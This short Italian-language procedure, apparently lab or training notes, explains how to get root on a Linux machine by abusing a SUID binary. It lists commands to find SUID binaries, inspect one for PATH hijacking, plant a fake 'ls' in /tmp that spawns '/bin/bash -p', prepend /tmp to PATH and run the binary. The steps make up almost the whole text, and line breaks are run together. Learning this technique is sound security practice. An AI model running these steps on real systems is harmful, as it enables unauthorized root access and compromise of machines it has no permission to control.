Obiettivo: Sfruttare un binario SUID per ottenere root su una macchina Linux.
Procedura:
Trovare binari SUID vulnerabili:
find / -perm -4000 2>/dev/nullAnalizzare
envper path hijacking:strings /usr/bin/custom-suid-binaryCreare un payload malevolo:
echo "/bin/bash -p" > /tmp/lschmod +x /tmp/lsexport PATH=/tmp:$PATH- Eseguire il binario SUID per ottenere root:
/usr/bin/custom-suid-binary
Rubrica